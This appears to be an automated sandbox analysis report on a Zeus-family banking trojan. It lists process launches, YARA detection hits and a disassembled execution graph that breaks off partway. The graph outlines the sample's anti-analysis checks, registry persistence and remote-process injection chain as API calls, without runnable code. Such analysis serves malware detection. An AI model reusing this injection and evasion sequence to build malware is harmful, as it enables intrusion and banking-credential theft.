                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000008.00000002.1842592106.00000000014B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000008.00000002.1844960712.0000000001510000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:10
                                                                                                                                                                                                            Start time:12:08:11
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4084 -s 784
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:12
                                                                                                                                                                                                            Start time:12:08:11
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 900
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:13
                                                                                                                                                                                                            Start time:12:08:12
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe"
                                                                                                                                                                                                            Imagebase:0x330000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000D.00000002.1895695128.0000000002D60000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000000D.00000002.1889058917.0000000002D00000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:15
                                                                                                                                                                                                            Start time:12:08:13
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6304 -s 752
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:17
                                                                                                                                                                                                            Start time:12:08:14
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe"
                                                                                                                                                                                                            Imagebase:0x330000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000011.00000002.1812866141.0000000002260000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000011.00000002.1813283213.00000000022C0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                            Start time:12:08:16
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe"
                                                                                                                                                                                                            Imagebase:0x330000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000013.00000002.1817738450.0000000002550000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000013.00000002.1817233105.00000000024B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                            Start time:12:08:16
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4628 -s 820
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Reputation:high
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                            Start time:12:08:16
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe"
                                                                                                                                                                                                            Imagebase:0x330000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000016.00000002.1820145637.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000016.00000002.1841274589.00000000024A0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                            Start time:12:08:19
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe"
                                                                                                                                                                                                            Imagebase:0x330000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000018.00000002.1854156512.0000000002C70000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000018.00000002.1875591417.0000000003060000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                            Start time:12:08:20
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe"
                                                                                                                                                                                                            Imagebase:0x330000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001A.00000002.1912799660.0000000000620000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001A.00000002.1934748852.0000000002090000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                                            Start time:12:08:21
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe"
                                                                                                                                                                                                            Imagebase:0x330000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001C.00000002.2003048692.0000000002AA0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001C.00000002.1961721864.0000000002700000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                                            Start time:12:08:22
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 780
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                            Start time:12:08:23
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe"
                                                                                                                                                                                                            Imagebase:0x330000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001F.00000002.1989491611.00000000028D0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001F.00000002.2028413256.0000000002AD0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                            Start time:12:08:24
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 3712
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                                            Start time:12:08:25
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe"
                                                                                                                                                                                                            Imagebase:0x330000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000024.00000002.2019868965.00000000027F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000024.00000002.2034641560.0000000002AB0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:38
                                                                                                                                                                                                            Start time:12:08:26
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 656
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            General

                                                                                                                                                                                                            Target ID:39
                                                                                                                                                                                                            Start time:12:08:29
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe"
                                                                                                                                                                                                            Imagebase:0x330000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000027.00000002.2056889554.0000000000E80000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000027.00000002.2057701274.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Disassembly

                                                                                                                                                                                                            Reset < >

                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:1.1%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                              Signature Coverage:64%
                                                                                                                                                                                                              Total number of Nodes:253
                                                                                                                                                                                                              Total number of Limit Nodes:16
                                                                                                                                                                                                              execution_graph 30439 401000 30440 401017 30439->30440 30441 401139 30439->30441 30440->30441 30442 401028 CreateFileA 30440->30442 30442->30441 30443 40104a 30442->30443 30457 401e00 GetCurrentThread OpenThreadToken 30443->30457 30446 401053 ConvertStringSecurityDescriptorToSecurityDescriptorW 30447 4010aa SetFilePointer LockFile WriteFile UnlockFile 30446->30447 30449 40106a GetSecurityDescriptorSacl 30446->30449 30448 4010f5 SetEndOfFile 30447->30448 30450 401105 30447->30450 30448->30450 30451 4010a0 LocalFree 30449->30451 30452 40108b SetNamedSecurityInfoA 30449->30452 30453 401113 GetHandleInformation 30450->30453 30454 40112f 30450->30454 30451->30447 30452->30451 30453->30454 30455 401122 30453->30455 30455->30454 30456 401128 CloseHandle 30455->30456 30456->30454 30458 401e21 GetCurrentProcess OpenProcessToken 30457->30458 30459 401e38 LookupPrivilegeValueA 30457->30459 30458->30459 30460 40104f 30458->30460 30461 401e82 CloseHandle 30459->30461 30462 401e5b AdjustTokenPrivileges 30459->30462 30460->30446 30460->30447 30461->30460 30462->30461 30463 401e75 GetLastError 30462->30463 30463->30461 30464 401e7f 30463->30464 30464->30461 30465 402d30 LoadLibraryA GetModuleFileNameA 30537 403a20 RegOpenKeyExA 30465->30537 30468 402d64 ExitProcess 30469 402d6c 30552 4021d0 CreateFileA 30469->30552 30474 402da1 30563 402360 CreateFileA 30474->30563 30475 402d89 GetTickCount PostMessageA 30475->30474 30484 402dc1 30673 401ea0 40 API calls 30484->30673 30485 402de3 IsUserAnAdmin GetModuleHandleA 30487 402e1c 30485->30487 30488 402dfd GetProcAddress 30485->30488 30491 402e22 30487->30491 30492 402e6e 30487->30492 30488->30487 30490 402e0f GetCurrentProcess 30488->30490 30489 402dc6 30493 402dd2 30489->30493 30494 402dca ExitProcess 30489->30494 30490->30487 30497 402e26 StrStrIA 30491->30497 30498 402e3c 30491->30498 30495 402e76 StrStrIA 30492->30495 30496 402efd 30492->30496 30674 403560 71 API calls 30493->30674 30503 402ea1 30495->30503 30504 402e8c 30495->30504 30501 402930 9 API calls 30496->30501 30497->30498 30499 402e5f 30497->30499 30589 402930 RegCreateKeyExA 30498->30589 30629 402a70 VirtualQuery GetModuleFileNameA 30499->30629 30507 402f08 GlobalFindAtomA 30501->30507 30506 402a70 88 API calls 30503->30506 30510 402930 9 API calls 30504->30510 30512 402ea6 GlobalFindAtomA 30506->30512 30513 402f58 ExitProcess 30507->30513 30514 402f18 GlobalAddAtomA IsUserAnAdmin 30507->30514 30509 402dd7 30509->30485 30516 402ddb ExitProcess 30509->30516 30517 402e97 30510->30517 30519 402ef6 30512->30519 30520 402eb6 GlobalAddAtomA IsUserAnAdmin 30512->30520 30521 402f39 IsUserAnAdmin 30514->30521 30522 402f29 30514->30522 30675 4028d0 43 API calls 30517->30675 30529 4012b0 9 API calls 30519->30529 30526 402ed7 IsUserAnAdmin 30520->30526 30527 402ec7 30520->30527 30528 402f44 30521->30528 30522->30521 30525 402e69 30525->30513 30530 402ee2 30526->30530 30527->30526 30677 4015a0 7 API calls 30528->30677 30529->30525 30676 4015a0 7 API calls 30530->30676 30533 402f4f 30533->30513 30535 401670 32 API calls 30533->30535 30534 402eed 30534->30519 30536 401670 32 API calls 30534->30536 30535->30513 30536->30519 30538 403a6a RegQueryValueExA 30537->30538 30539 403acd GetUserNameA CharUpperA strstr 30537->30539 30540 403a9b RegCloseKey 30538->30540 30541 403a8f RegCloseKey 30538->30541 30542 402d60 30539->30542 30543 403b0b strstr 30539->30543 30540->30539 30544 403aae 30540->30544 30541->30539 30542->30468 30542->30469 30543->30542 30545 403b24 strstr 30543->30545 30544->30539 30544->30542 30545->30542 30546 403b3d GetSystemWindowsDirectoryA GetVolumeInformationA 30545->30546 30546->30542 30547 403b7d 30546->30547 30547->30542 30548 403b99 GetModuleFileNameA StrStrIA 30547->30548 30548->30542 30549 403bc5 StrStrIA 30548->30549 30549->30542 30550 403bd7 StrStrIA 30549->30550 30550->30542 30551 403be9 30550->30551 30551->30542 30553 402350 30552->30553 30554 402320 DeviceIoControl CloseHandle 30552->30554 30555 4020e0 memset SHGetFolderPathA 30553->30555 30554->30553 30556 4021a7 30555->30556 30557 40213e PathAppendA SetCurrentDirectoryA 30555->30557 30558 4021b2 FindWindowA 30556->30558 30559 4021ab FreeLibrary 30556->30559 30557->30556 30560 402161 LoadLibraryA 30557->30560 30558->30474 30558->30475 30559->30558 30560->30556 30561 402175 GetProcAddress 30560->30561 30561->30556 30562 402185 30561->30562 30562->30556 30564 402403 WriteFile GetSystemTimeAsFileTime WriteFile CloseHandle 30563->30564 30565 402444 30563->30565 30564->30565 30566 402450 SHGetFolderPathA 30565->30566 30567 402535 30566->30567 30568 402477 30566->30568 30570 402540 SHGetFolderPathA 30567->30570 30568->30568 30569 4024ec MoveFileA 30568->30569 30569->30567 30571 40256b 30570->30571 30574 40266f 30570->30574 30571->30571 30572 40257a CreateFileA 30571->30572 30573 4025d1 11 API calls 30572->30573 30572->30574 30573->30574 30575 402680 CoInitializeEx 30574->30575 30576 4026ae 30575->30576 30577 4026bf GetModuleFileNameW SysAllocString 30575->30577 30576->30577 30579 4028c4 IsUserAnAdmin 30576->30579 30578 4026ed SysAllocString 30577->30578 30584 402866 30577->30584 30580 402853 SysFreeString 30578->30580 30581 4026fe CoCreateInstance 30578->30581 30579->30484 30579->30485 30582 402863 SysFreeString 30580->30582 30580->30584 30583 402827 30581->30583 30586 402725 30581->30586 30582->30584 30583->30580 30584->30579 30585 4028be CoUninitialize 30584->30585 30585->30579 30586->30580 30586->30583 30587 4027b3 CoCreateInstance 30586->30587 30588 4027d5 30587->30588 30588->30583 30590 402975 GetEnvironmentVariableA PathAddBackslashA GetVolumeInformationA _snprintf 30589->30590 30591 4029fd RegCreateKeyExA 30589->30591 30592 4029e0 RegSetValueExA 30590->30592 30591->30592 30593 402a44 30591->30593 30592->30593 30594 402a4c RegFlushKey RegCloseKey 30593->30594 30595 402a5d GetCurrentProcessId 30593->30595 30594->30595 30597 401670 30595->30597 30598 4018d8 Sleep 30597->30598 30600 401686 30597->30600 30598->30513 30601 4016a5 30600->30601 30602 40169b Sleep 30600->30602 30678 401cf0 11 API calls 30600->30678 30679 401cf0 11 API calls 30601->30679 30602->30600 30602->30601 30604 4016ac 30605 4018d3 30604->30605 30606 4016b4 OpenProcess 30604->30606 30605->30598 30606->30605 30607 4016cf GetModuleHandleA 30606->30607 30608 401706 30607->30608 30609 4016eb GetProcAddress 30607->30609 30610 40170c GetModuleHandleA 30608->30610 30611 40173f VirtualAllocEx 30608->30611 30609->30608 30612 4016f9 GetCurrentProcess 30609->30612 30613 401722 GetProcAddress 30610->30613 30614 40172e 30610->30614 30615 4018b0 GetHandleInformation 30611->30615 30616 401782 WriteProcessMemory 30611->30616 30612->30608 30613->30614 30614->30611 30614->30615 30615->30605 30617 4018c6 30615->30617 30618 4017ae 30616->30618 30619 40181f WriteProcessMemory FlushInstructionCache CreateRemoteThread 30616->30619 30617->30605 30620 4018cc CloseHandle 30617->30620 30621 4017b1 VirtualAlloc 